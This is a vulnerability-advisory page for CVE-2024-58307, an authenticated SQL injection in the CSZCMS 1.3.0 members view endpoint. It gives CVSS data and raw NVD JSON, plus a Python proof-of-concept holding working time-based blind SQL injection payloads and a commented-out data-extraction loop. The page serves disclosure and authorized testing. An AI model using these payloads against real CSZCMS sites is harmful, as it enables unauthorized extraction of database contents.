Security Vulnerability Report
中文
CVE-2024-58307 CVSS 8.8 HIGH

CVE-2024-58307

Published: 2025-12-11 22:15:52
Last Modified: 2025-12-22 18:40:41
Source: [email protected]

Description

CSZCMS 1.3.0 contains an authenticated SQL injection vulnerability in the members view functionality that allows authenticated attackers to manipulate database queries. Attackers can inject malicious SQL code through the view parameter to potentially execute time-based blind SQL injection attacks and extract database information.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:cszcms:csz_cms:1.3.0:*:*:*:*:*:*:* - VULNERABLE
CSZCMS 1.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import time import string # CVE-2024-58307 SQL Injection PoC for CSZCMS 1.3.0 # Authenticated time-based blind SQL injection via view parameter target_url = "http://target.com/cszcms/index.php/members/view" # Login first to obtain session cookie login_url = "http://target.com/cszcms/index.php/login" login_data = { "username": "attacker", "password": "password123" } session = requests.Session() # login_response = session.post(login_url, data=login_data) # cookies = login_response.cookies # SQL Injection payload example - time-based blind # This payload tests if SQL injection is possible by introducing a 5-second delay injection_payload = "1' AND (SELECT * FROM (SELECT SLEEP(5))a) AND '1'='1" params = { "view": injection_payload } # Send malicious request # response = session.get(target_url, params=params, cookies=cookies) # Data extraction example (pseudo-code) def extract_data_via_blind_sql(): """ Blind SQL injection data extraction logic Uses binary search to efficiently extract data character by character """ charset = string.ascii_lowercase + string.digits + "_@." extracted = "" # Example: Extract database user # for i in range(1, 50): # for char in charset: # payload = f"1' AND IF(SUBSTRING(USER(),{i},1)='{char}',SLEEP(2),0) AND '1'='1" # start = time.time() # # Make request and measure response time # if response_time > threshold: # extracted += char # break return extracted print("PoC for CVE-2024-58307 - CSZCMS SQL Injection") print("Target: CSZCMS 1.3.0") print("Vulnerability: Authenticated SQL Injection in members view endpoint")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-58307", "sourceIdentifier": "[email protected]", "published": "2025-12-11T22:15:52.173", "lastModified": "2025-12-22T18:40:40.883", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CSZCMS 1.3.0 contains an authenticated SQL injection vulnerability in the members view functionality that allows authenticated attackers to manipulate database queries. Attackers can inject malicious SQL code through the view parameter to potentially execute time-based blind SQL injection attacks and extract database information."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cszcms:csz_cms:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "B83DE2F9-E5FF-4A78-A40C-AB8CFF373992"}]}]}], "references": [{"url": "https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.3.0.zip/download", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.cszcms.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51916", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/cszcms-authenticated-sql-injection-via-members-view-endpoint", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.